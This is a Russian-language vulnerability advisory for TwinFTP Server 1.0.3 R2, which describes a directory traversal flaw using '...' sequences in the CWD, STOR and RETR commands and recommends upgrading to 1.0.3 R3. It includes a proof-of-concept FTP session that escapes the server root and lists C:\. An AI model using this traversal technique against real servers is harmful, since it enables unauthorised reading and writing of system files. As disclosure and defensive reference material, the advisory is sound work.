Доступ к произвольным файлам в TwinFTP Server

Дата публикации:
13.09.2004
Дата изменения:
30.01.2009
Всего просмотров:
1098
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Раскрытие системных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Twin FTP Server 1.x
Уязвимые версии: TwinFTP Server 1.0.3 R2

Описание: Уязвимость обнаружена в TwinFTP Server. Удаленный авторизованный пользователь может записывать файлы, расположенные вне FTP каталога.

Сервер не проверяет данные пользователя в FTP командах. Удаленный авторизованный пользователь может представить специально обработанное имя каталога, содержащее последовательность символов обхода каталога '.../' к CWD, STOR и RETR командам, чтобы записать произвольные файлы в произвольное местоположение с привилегиями FTP сервера.

Пример/Эксплоит:

C:\>ftp 192.168.1.7
Connected to 192.168.1.7.
220 TwinFTP Server Standard 1.0.3 R2 (win32)
User (192.168.1.7:(none)): anonymous
331 Need password.
Password:
230 User logged in, proceed.
ftp> pwd
257 "/" is current directory.
ftp> cd ..
550 CDUP command failure, need account.
ftp> cd ...\windows				Using triple dots ... to change directory to C:\windows
250 Directory changed to ...\windows
ftp> cd ..					
250 CDUP command successfully.				Now we are at C:\
ftp> ls
200 PORT command OK.
150 Opening ASCII mode data connection for /bin/ls
ntldr							Directory listing of C:\
NTDETECT.COM
boot.ini
CONFIG.SYS
AUTOEXEC.BAT
IO.SYS
MSDOS.SYS
pagefile.sys
nessuswx.dbg
_NavCClt.Log
uspscan.cab

226 Data transfer successfully.
ftp: 133 bytes received in 0.01Seconds 13.30Kbytes/sec.
ftp>

URL производителя: http://www.twinftp.com/

Решение:Установите обновленную версию программы (1.0.3 R3)

Ссылки: http://www.security.org.sg/vuln/twinftp103r2.html

или введите имя

CAPTCHA